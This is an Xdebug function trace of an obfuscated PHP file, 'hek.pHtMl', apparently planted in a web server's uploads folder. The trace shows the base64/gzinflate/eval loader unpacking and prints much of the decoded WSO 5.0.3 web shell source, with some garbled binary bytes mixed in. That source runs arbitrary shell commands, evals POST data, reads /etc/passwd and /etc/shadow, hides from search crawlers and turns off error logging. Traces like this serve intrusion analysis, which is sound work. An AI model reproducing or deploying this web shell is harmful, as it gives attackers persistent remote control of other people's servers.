Version: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 19:27:53.700731] 1 0 1 0.000159 393512 1 3 0 0.000491 441072 {main} 1 /var/www/html/uploads/hek.pHtMl 0 0 1 A /var/www/html/uploads/hek.pHtMl 1 $MdRwlQi6788 = 'y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je' 1 A /var/www/html/uploads/hek.pHtMl 1 $q2866 = 'create_function' 1 A /var/www/html/uploads/hek.pHtMl 1 $pHFdNhg9688 = '$x="' 1 A /var/www/html/uploads/hek.pHtMl 1 $MYtraky2482 = '";$a=base64_decode($x);$b=gzinflate($a);eval($b);' 1 A /var/www/html/uploads/hek.pHtMl 1 $UrR1094 = '\'5b3petu6sij4O+f7zjsgXNqLUqzZTlYiR3YcT3EG2/GQyc7WpShKYkyJWiTlIYn/9nvcZ+hH6BfoZ+gn6arCQHCQLCfr3nP6633OikWgUCgUgEIBKFQNPL9reaxg+54flAs9p29Nvahj2ZHrj+Pvaeh0rG/WdZxiD60gdKJywQ/LhdDqO52R33PKBfuqVy4M/ZHToV+W51qhE67+R6EzscLwyg96rM0MY5XValZv5I7/E3KsgTOOIDkKps4qJkzHrg3YIMk8PdmpPDUhtVYrCLIweWPsj29G7ncnMKlEnLPjek74zhpjOuRsBdMJNLDNRr3HxULnePvow/bRmfnq5OSwcwpfnY3d7f0T82sJwN0+Kz50Q2gWQG4eHLzZ2z7LKfbq4BgLVI0L58b4WiqxH//5Hw8mgR/50c3EKd5VoswEUVjlLdZadEaT6AYKHQLcmSlYCwVKgDiTCm1RHEoTzUHHjinJAuTJPIuytC9AB6jGl0VjGvUrT5G8dI1l1n' 1 A /var/www/html/uploads/hek.pHtMl 1 $JTx2343 .= '$x="' 1 A /var/www/html/uploads/hek.pHtMl 1 $JTx2343 .= '\'5b3petu6sij4O+f7zjsgXNqLUqzZTlYiR3YcT3EG2/GQyc7WpShKYkyJWiTlIYn/9nvcZ+hH6BfoZ+gn6arCQHCQLCfr3nP6633OikWgUCgUgEIBKFQNPL9reaxg+54flAs9p29Nvahj2ZHrj+Pvaeh0rG/WdZxiD60gdKJywQ/LhdDqO52R33PKBfuqVy4M/ZHToV+W51qhE67+R6EzscLwyg96rM0MY5XValZv5I7/E3KsgTOOIDkKps4qJkzHrg3YIMk8PdmpPDUhtVYrCLIweWPsj29G7ncnMKlEnLPjek74zhpjOuRsBdMJNLDNRr3HxULnePvow/bRmfnq5OSwcwpfnY3d7f0T82sJwN0+Kz50Q2gWQG4eHLzZ2z7LKfbq4BgLVI0L58b4WiqxH//5Hw8mgR/50c3EKd5VoswEUVjlLdZadEaT6AYKHQLcmSlYCwVKgDiTCm1RHEoTzUHHjinJAuTJPIuytC9AB6jGl0VjGvUrT5G8dI1l1n' 1 A /var/www/html/uploads/hek.pHtMl 1 $JTx2343 .= '";$a=base64_decode($x);$b=gzinflate($a);eval($b);' 2 4 0 0.000700 478088 create_function 0 /var/www/html/uploads/hek.pHtMl 1 2 '' '$x="\'5b3petu6sij4O+f7zjsgXNqLUqzZTlYiR3YcT3EG2/GQyc7WpShKYkyJWiTlIYn/9nvcZ+hH6BfoZ+gn6arCQHCQLCfr3nP6633OikWgUCgUgEIBKFQNPL9reaxg+54flAs9p29Nvahj2ZHrj+Pvaeh0rG/WdZxiD60gdKJywQ/LhdDqO52R33PKBfuqVy4M/ZHToV+W51qhE67+R6EzscLwyg96rM0MY5XValZv5I7/E3KsgTOOIDkKps4qJkzHrg3YIMk8PdmpPDUhtVYrCLIweWPsj29G7ncnMKlEnLPjek74zhpjOuRsBdMJNLDNRr3HxULnePvow/bRmfnq5OSwcwpfnY3d7f0T82sJwN0+Kz50Q2gWQG4eHLzZ2z7LKfbq4BgLVI0L58b4WiqxH//5Hw8mgR/50c3EKd5VoswEUVjlLdZadEaT6AYKHQLcmSlYCwVKgDiTCm1RHEoTzUHHjinJAuTJPIuytC9AB6jGl0VjGvUrT5G8dI' 3 5 0 0.000969 590128 {internal eval} 1 /var/www/html/uploads/hek.pHtMl 1 0 3 5 1 0.000985 590128 3 5 R NULL 2 4 1 0.001000 516056 2 4 R '\000lambda_1' 1 A /var/www/html/uploads/hek.pHtMl 1 $mEriqO3481 = '\000lambda_1' 2 6 0 0.001029 515992 __lambda_func 1 /var/www/html/uploads/hek.pHtMl 1 0 2 A /var/www/html/uploads/hek.pHtMl(1) : runtime-created function 1 $x = '\'5b3petu6sij4O+f7zjsgXNqLUqzZTlYiR3YcT3EG2/GQyc7WpShKYkyJWiTlIYn/9nvcZ+hH6BfoZ+gn6arCQHCQLCfr3nP6633OikWgUCgUgEIBKFQNPL9reaxg+54flAs9p29Nvahj2ZHrj+Pvaeh0rG/WdZxiD60gdKJywQ/LhdDqO52R33PKBfuqVy4M/ZHToV+W51qhE67+R6EzscLwyg96rM0MY5XValZv5I7/E3KsgTOOIDkKps4qJkzHrg3YIMk8PdmpPDUhtVYrCLIweWPsj29G7ncnMKlEnLPjek74zhpjOuRsBdMJNLDNRr3HxULnePvow/bRmfnq5OSwcwpfnY3d7f0T82sJwN0+Kz50Q2gWQG4eHLzZ2z7LKfbq4BgLVI0L58b4WiqxH//5Hw8mgR/50c3EKd5VoswEUVjlLdZadEaT6AYKHQLcmSlYCwVKgDiTCm1RHEoTzUHHjinJAuTJPIuytC9AB6jGl0VjGvUrT5G8dI1l1n' 3 7 0 0.001085 515992 base64_decode 0 /var/www/html/uploads/hek.pHtMl(1) : runtime-created function 1 1 '\'5b3petu6sij4O+f7zjsgXNqLUqzZTlYiR3YcT3EG2/GQyc7WpShKYkyJWiTlIYn/9nvcZ+hH6BfoZ+gn6arCQHCQLCfr3nP6633OikWgUCgUgEIBKFQNPL9reaxg+54flAs9p29Nvahj2ZHrj+Pvaeh0rG/WdZxiD60gdKJywQ/LhdDqO52R33PKBfuqVy4M/ZHToV+W51qhE67+R6EzscLwyg96rM0MY5XValZv5I7/E3KsgTOOIDkKps4qJkzHrg3YIMk8PdmpPDUhtVYrCLIweWPsj29G7ncnMKlEnLPjek74zhpjOuRsBdMJNLDNRr3HxULnePvow/bRmfnq5OSwcwpfnY3d7f0T82sJwN0+Kz50Q2gWQG4eHLzZ2z7LKfbq4BgLVI0L58b4WiqxH//5Hw8mgR/50c3EKd5VoswEUVjlLdZadEaT6AYKHQLcmSlYCwVKgDiTCm1RHEoTzUHHjinJAuTJPIuytC9AB6jGl0VjGvUrT5G8dI1l1n' 3 7 1 0.001209 552888 3 7 R 'zۺ(;; \\ڋRNV"Gv\034Oq\006֥(JbLZ$!{gG\027g\'@p,\'s}ΊEP(\024B\001(T\r+>tCh\026@n\036\034>)\030\vT\vZ*\037\037\017&\037)U\004QX-ZtF\006\n\035\002ܙ)X\v\005J8\nmQ\034J\023Aǎ)\002+>tCh\026@n\036\034>)\030\vT\vZ*\037\037\017&\037)U\004QX-ZtF\006\n\035\002ܙ)X\v\005J8\nmQ\034J\023Aǎ)\002+>tCh\026@n\036\034>)\030\vT\vZ*\037\037\017&\037)U\004QX-ZtF\006\n\035\002ܙ)X\v\005J8\nmQ\034J\023Aǎ)\002=strlen($str))break;}}return base64_decode($enc_str);}\r\n@ini_set(\'error_log\',NULL);\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'max_execution_time\',0);\r\n@set_time_limit(0);\r\nif (PHP_VERSION_ID < 70000)\r\n\t@set_magic_quotes_runtime(0);\r\n@define(\'VERSION\', \'5.0.3\');\r\nif(get_magic_quotes_gpc()) {\r\n\tfunction stripslashes_array($array) {\r\n\t\treturn is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n\t}\r\n\t$_POST = stripslashes_array($_POST);\r\n $_COOKIE = stripslashes_array($_COOKIE);\r\n}\r\n/* (С) 11.2011 oRb */\r\nif(!empty($_password)) {\r\n if(isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $_password))\r\n prototype(md5($_SERVER[\'HTTP_HOST\']), $_password);\r\n if (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])]) || ($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])] != $_password))\r\n hardLogin();\r\n}\r\nif(!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\']))\r\n $_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$_agent;\r\nfunction hardLogin() {\r\n\t\tif(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\r\n\t\t $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");\r\n\t\t if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\r\n\t\t header(\'HTTP/1.0 404 Not Found\');\r\n\t\t exit;\r\n\t\t }\r\n\t\t}\r\n\t\techo "";\r\n\tdie("
\r\n\t\r\n\t");\r\n}\r\nif(strtolower(substr(PHP_OS,0,3)) == "win")\r\n\t$os = \'win\';\r\nelse\r\n\t$os = \'nix\';\r\n$safe_mode = @ini_get(\'safe_mode\');\r\nif(!$safe_mode)\r\n error_reporting(0);\r\n$disable_functions = @ini_get(\'disable_functions\');\r\n$home_cwd = @getcwd();\r\nif(isset($_POST[\'c\']))\r\n\t@chdir($_POST[\'c\']);\r\n$cwd = @getcwd();\r\nif($os == \'win\') {\r\n\t$home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n\t$cwd = str_replace("\\\\", "/", $cwd);\r\n}\r\nif($cwd[strlen($cwd)-1] != \'/\')\r\n\t$cwd .= \'/\';\r\n/* (С) 04.2015 Pirat */\r\nfunction hardHeader() {\r\n\tif(empty($_POST[\'charset\']))\r\n\t\t$_POST[\'charset\'] = $GLOBALS[\'_unicode\'];\r\n\techo "" . $_SERVER[\'HTTP_HOST\'] . " - WSO " . VERSION ."\r\n\r\n\r\n
\r\n
\r\n\r\n\r\n\r\n\r\n\r\n\r\n
";\r\n\t$freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n\t$totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n\t$totalSpace = $totalSpace?$totalSpace:1;\r\n\t$release = @php_uname(\'r\');\r\n\t$kernel = @php_uname(\'s\');\r\n\t$explink = \'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=\';\r\n\tif(strpos(\'Linux\', $kernel) !== false)\r\n\t\t$explink .= urlencode(\'Linux Kernel \' . substr($release,0,6));\r\n\telse\r\n\t\t$explink .= urlencode($kernel . \' \' . substr($release,0,3));\r\n\tif(!function_exists(\'posix_getegid\')) {\r\n\t\t$user = @get_current_user();\r\n\t\t$uid = @getmyuid();\r\n\t\t$gid = @getmygid();\r\n\t\t$group = "?";\r\n\t} else {\r\n\t\t$uid = @posix_getpwuid(@posix_geteuid());\r\n\t\t$gid = @posix_getgrgid(@posix_getegid());\r\n\t\t$user = $uid[\'name\'];\r\n\t\t$uid = $uid[\'uid\'];\r\n\t\t$group = $gid[\'name\'];\r\n\t\t$gid = $gid[\'gid\'];\r\n\t}\r\n\t$cwd_links = \'\';\r\n\t$path = explode("/", $GLOBALS[\'cwd\']);\r\n\t$n=count($path);\r\n\tfor($i=0; $i<$n-1; $i++) {\r\n\t\t$cwd_links .= "".$path[$i]."/";\r\n\t}\r\n\t$charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n\t$opt_charsets = \'\';\r\n\tforeach($charsets as $microsoft)\r\n\t\t$opt_charsets .= \'\';\r\n\t$m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Infect\'=>\'Infect\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Safe mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Anonymizer\'=>\'Anonymizer\',\'Network\'=>\'Network\');\r\n\tif(!empty($GLOBALS[\'_password\']))\r\n\t$m[\'Logout\'] = \'Logout\';\r\n\t$m[\'Self remove\'] = \'SelfRemove\';\r\n\t$menu = \'\';\r\n\tforeach($m as $k => $v)\r\n\t\t$menu .= \'[ \'.$k.\' ]\';\r\n\t$drives = "";\r\n\tif ($GLOBALS[\'os\'] == \'win\') {\r\n\t\tforeach(range(\'c\',\'z\') as $drive)\r\n\t\tif (is_dir($drive.\':\\\\\'))\r\n\t\t\t$drives .= \'[ \'.$drive.\' ] \';\r\n\t}\r\n\t/* (С) 08.2015 dmkcv */\r\n\techo \'\'.\r\n\t\t \'\'.\r\n\t\t \'
Uname:
User:
Php:
Hdd:
Cwd:\'.($GLOBALS[\'os\'] == \'win\'?\'
Drives:\':\'\').\'		\'.substr(@php_uname(), 0, 120).\' [ Google ] [ Exploit-DB ]
\'.$uid.\' ( \'.$user.\' ) Group: \'.$gid.\' ( \' .$group. \' )
\'.@phpversion().\' Safe mode: \'.($GLOBALS[\'safe_mode\']?\'ON\':\'OFF\').\' [ phpinfo ] Datetime: \'.date(\'Y-m-d H:i:s\').\'
\'.viewSize($totalSpace).\' Free: \'.viewSize($freeSpace).\' (\'.round(100/($totalSpace/$freeSpace),2).\'%)
\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' [ home ]
\'.$drives.\'
Server IP:
\'.gethostbyname($_SERVER["HTTP_HOST"]).\'
Client IP:
\'.$_SERVER[\'REMOTE_ADDR\'].\'
\'.\r\n\t\t \'\'.$menu.\'
\';\r\n}\r\nfunction hardFooter() {\r\n\t$is_writable = is_writable($GLOBALS[\'cwd\'])?" [ Writeable ]":" (Not writable)";\r\n echo "\r\n
\r\n\r\n\t\r\n\t\t\r\n\t\t\r\n\t\r\n\t\t\r\n\t\t\r\n\t\r\n\t\t\r\n\t\t\r\n\t
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\tUpload file:$is_writable

\r\n\t";\r\n}\r\nif (!function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) { function posix_getpwuid($p) {return false;} }\r\nif (!function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) { function posix_getgrgid($p) {return false;} }\r\n\r\n$var_exec = \'exec\';\r\n$var_passthru = \'passthru\';\r\n$var_system = \'system\';\r\n$var_shell_exec = \'shell_exec\';\r\n\r\nfunction ex($in) {\r\n\t$apple = \'\';\r\n\tif (function_exists($var_exec)) {\r\n\t\t@exec($in,$apple);\r\n\t\t$apple = @join("\\n",$apple);\r\n\t} elseif (function_exists($var_passthru)) {\r\n\t\tob_start();\r\n\t\t@passthru($in);\r\n\t\t$apple = ob_get_clean();\r\n\t} elseif (function_exists($var_system)) {\r\n\t\tob_start();\r\n\t\t@system($in);\r\n\t\t$apple = ob_get_clean();\r\n\t} elseif (function_exists($var_shell_exec)) {\r\n\t\t$apple = shell_exec($in);\r\n\t} elseif (is_resource($f = @popen($in,"r"))) {\r\n\t\t$apple = "";\r\n\t\twhile(!@feof($f))\r\n\t\t\t$apple .= fread($f,1024);\r\n\t\tpclose($f);\r\n\t} else return "↳ Unable to execute command\\n";\r\n\treturn ($apple==\'\'?"↳ Query did not return anything\\n":$apple);\r\n}\r\nfunction viewSize($s) {\r\n\tif($s >= 1073741824)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n\telseif($s >= 1048576)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n\telseif($s >= 1024)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n\telse\r\n\t\treturn $s . \' B\';\r\n}\r\nfunction perms($p) {\r\n\tif (($p & 0xC000) == 0xC000)$i = \'s\';\r\n\telseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n\telseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n\telseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n\telseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n\telseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n\telseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n\telse $i = \'u\';\r\n\t$i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n\t$i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n\t$i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n\treturn $i;\r\n}\r\nfunction viewPermsColor($f) {\r\n\tif (!@is_readable($f))\r\n\t\treturn \'\'.perms(@fileperms($f)).\'\';\r\n\telseif (!@is_writable($f))\r\n\t\treturn \'\'.perms(@fileperms($f)).\'\';\r\n\telse\r\n\t\treturn \'\'.perms(@fileperms($f)).\'\';\r\n}\r\nfunction hardScandir($dir) {\r\n if(function_exists("scandir")) {\r\n return scandir($dir);\r\n } else {\r\n $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh)))\r\n $files[] = $filename;\r\n return $files;\r\n }\r\n}\r\nfunction which($p) {\r\n\t$path = ex(\'which \' . $p);\r\n\tif(!empty($path))\r\n\t\treturn $path;\r\n\treturn false;\r\n}\r\nfunction actionRC() {\r\n\tif(!@$_POST[\'p1\']) {\r\n\t\t$a = array(\r\n\t\t\t"uname" => php_uname(),\r\n\t\t\t"php_version" => phpversion(),\r\n\t\t\t"VERSION" => VERSION,\r\n\t\t\t"safemode" => @ini_get(\'safe_mode\')\r\n\t\t);\r\n\t\techo serialize($a);\r\n\t} else {\r\n\t\teval($_POST[\'p1\']);\r\n\t}\r\n}\r\nfunction prototype($k, $v) {\r\n $_COOKIE[$k] = $v;\r\n setcookie($k, $v);\r\n}\r\nfunction actionSecInfo() {\r\n\thardHeader();\r\n\techo \'

Server security information

\';\r\n\tfunction showSecParam($n, $v) {\r\n\t\t$v = trim($v);\r\n\t\tif($v) {\r\n\t\t\techo \'\' . $n . \': \';\r\n\t\t\tif(strpos($v, "\\n") === false)\r\n\t\t\t\techo $v . \'
\';\r\n\t\t\telse\r\n\t\t\t\techo \'
\' . $v . \'
\';\r\n\t\t}\r\n\t}\r\n\tshowSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n if(function_exists(\'apache_get_modules\'))\r\n showSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules()));\r\n\tshowSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');\r\n\tshowSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n\tshowSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n\tshowSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n\tshowSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n\t$temp=array();\r\n\tif(function_exists(\'mysql_get_client_info\'))\r\n\t\t$temp[] = "MySql (".mysql_get_client_info().")";\r\n\telse\r\n\t\t$temp[] = "MySql (".mysqli_get_client_info().")";\r\n\tif(function_exists(\'mssql_connect\'))\r\n\t\t$temp[] = "MSSQL";\r\n\tif(function_exists(\'pg_connect\'))\r\n\t\t$temp[] = "PostgreSQL";\r\n\tif(function_exists(\'oci_connect\'))\r\n\t\t$temp[] = "Oracle";\r\n\tshowSecParam(\'Supported databases\', implode(\', \', $temp));\r\n\techo \'
\';\r\n\tif($GLOBALS[\'os\'] == \'nix\') {\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes [view]":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes [view]":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) {\r\n $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n echo \'
\';\r\n $temp=array();\r\n foreach ($userful as $microsoft)\r\n if(which($microsoft))\r\n $temp[] = $microsoft;\r\n showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $microsoft)\r\n if(which($microsoft))\r\n $temp[] = $microsoft;\r\n showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $microsoft)\r\n if(which($microsoft))\r\n $temp[] = $microsoft;\r\n showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'
\';\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n\t\t\t\tshowSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n }\r\n\t} else {\r\n\t\tshowSecParam(\'OS Version\',ex(\'ver\'));\r\n\t\tshowSecParam(\'Account Settings\', iconv(\'CP866\', \'UTF-8\',ex(\'net accounts\')));\r\n\t\tshowSecParam(\'User Accounts\', iconv(\'CP866\', \'UTF-8\',ex(\'net user\')));\r\n\t}\r\n\techo \'
\';\r\n\thardFooter();\r\n}\r\n/* (С) 10.2012 Svet */\r\nfunction actionFilesTools() {\r\n\tif( isset($_POST[\'p1\']) )\r\n\t\t$_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n\tif(@$_POST[\'p2\']==\'download\') {\r\n\t\tif(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) {\r\n\t\t\tob_start("ob_gzhandler", 4096);\r\n\t\t\theader("Content-Disposition: attachment; filename=".basename($_POST[\'p1\']));\r\n\t\t\tif (function_exists("mime_content_type")) {\r\n\t\t\t\t$type = @mime_content_type($_POST[\'p1\']);\r\n\t\t\t\theader("Content-Type: " . $type);\r\n\t\t\t} else\r\n header("Content-Type: application/octet-stream");\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], "r");\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile(!@feof($fp))\r\n\t\t\t\t\techo @fread($fp, 1024);\r\n\t\t\t\tfclose($fp);\r\n\t\t\t}\r\n\t\t}exit;\r\n\t}\r\n\tif( @$_POST[\'p2\'] == \'mkfile\' ) {\r\n\t\tif(!file_exists($_POST[\'p1\'])) {\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'w\');\r\n\t\t\tif($fp) {\r\n\t\t\t\t$_POST[\'p2\'] = "edit";\r\n\t\t\t\tfclose($fp);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\thardHeader();\r\n\techo \'

File tools

\';\r\n\tif( !file_exists(@$_POST[\'p1\']) ) {\r\n\t\techo \'File not exists\';\r\n\t\thardFooter();\r\n\t\treturn;\r\n\t}\r\n\t$uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n\tif(!$uid) {\r\n\t\t$uid[\'name\'] = @fileowner($_POST[\'p1\']);\r\n\t\t$gid[\'name\'] = @filegroup($_POST[\'p1\']);\r\n\t} else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\']));\r\n\techo \'Name: \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' Size: \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' Permission: \'.viewPermsColor($_POST[\'p1\']).\' Owner/Group: \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'
\';\r\n\techo \'Create time: \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' Access time: \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' Modify time: \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'

\';\r\n\tif( empty($_POST[\'p2\']) )\r\n\t\t$_POST[\'p2\'] = \'view\';\r\n\tif( is_file($_POST[\'p1\']) )\r\n\t\t$m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\', \'Frame\');\r\n\telse\r\n\t\t$m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n\tforeach($m as $v)\r\n\t\techo \'\'.((strtolower($v)==@$_POST[\'p2\'])?\'[ \'.$v.\' ]\':$v).\' \';\r\n\techo \'

\';\r\n\tswitch($_POST[\'p2\']) {\r\n\t\tcase \'view\':\r\n\t\t\techo \'
\';\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'r\');\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile( !@feof($fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread($fp, 1024));\r\n\t\t\t\t@fclose($fp);\r\n\t\t\t}\r\n\t\t\techo \'
\';\r\n\t\t\tbreak;\r\n\t\tcase \'highlight\':\r\n\t\t\tif( @is_readable($_POST[\'p1\']) ) {\r\n\t\t\t\techo \'
\';\r\n\t\t\t\t$oRb = @highlight_file($_POST[\'p1\'],true);\r\n\t\t\t\techo str_replace(array(\'\'), array(\'\'),$oRb).\'
\';\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\tcase \'chmod\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$perms = 0;\r\n\t\t\t\tfor($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)\r\n\t\t\t\t\t$perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n\t\t\t\tif(!@chmod($_POST[\'p1\'], $perms))\r\n\t\t\t\t\techo \'Can\\\'t set permissions!
\';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo \'
\';\r\n\t\t\tbreak;\r\n\t\tcase \'edit\':\r\n\t\t\tif( !is_writable($_POST[\'p1\'])) {\r\n\t\t\t\techo \'File isn\\\'t writeable\';\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$time = @filemtime($_POST[\'p1\']);\r\n\t\t\t\t$_POST[\'p3\'] = substr($_POST[\'p3\'],1);\r\n\t\t\t\t$fp = @fopen($_POST[\'p1\'],"w");\r\n\t\t\t\tif($fp) {\r\n\t\t\t\t\t@fwrite($fp,$_POST[\'p3\']);\r\n\t\t\t\t\t@fclose($fp);\r\n\t\t\t\t\techo \'Saved!
\';\r\n\t\t\t\t\t@touch($_POST[\'p1\'],$time,$time);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo \'
\';\r\n\t\t\tbreak;\r\n\t\tcase \'hexdump\':\r\n\t\t\t$c = @file_get_contents($_POST[\'p1\']);\r\n\t\t\t$n = 0;\r\n\t\t\t$h = array(\'00000000
\',\'\',\'\');\r\n\t\t\t$len = strlen($c);\r\n\t\t\tfor ($i=0; $i<$len; ++$i) {\r\n\t\t\t\t$h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n\t\t\t\tswitch ( ord($c[$i]) ) {\r\n\t\t\t\t\tcase 0: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 9: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 10: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 13: $h[2] .= \' \'; break;\r\n\t\t\t\t\tdefault: $h[2] .= $c[$i]; break;\r\n\t\t\t\t}\r\n\t\t\t\t$n++;\r\n\t\t\t\tif ($n == 32) {\r\n\t\t\t\t\t$n = 0;\r\n\t\t\t\t\tif ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'
\';}\r\n\t\t\t\t\t$h[1] .= \'
\';\r\n\t\t\t\t\t$h[2] .= "\\n";\r\n\t\t\t\t}\r\n\t\t \t}\r\n\t\t\techo \'
\'.$h[0].\'
\'.$h[1].\'
\'.htmlspecialchars($h[2]).\'
\';\r\n\t\t\tbreak;\r\n\t\tcase \'rename\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\tif(!@rename($_POST[\'p1\'], $_POST[\'p3\']))\r\n\t\t\t\t\techo \'Can\\\'t rename!
\';\r\n\t\t\t\telse\r\n\t\t\t\t\tdie(\'\');\r\n\t\t\t}\r\n\t\t\techo \'
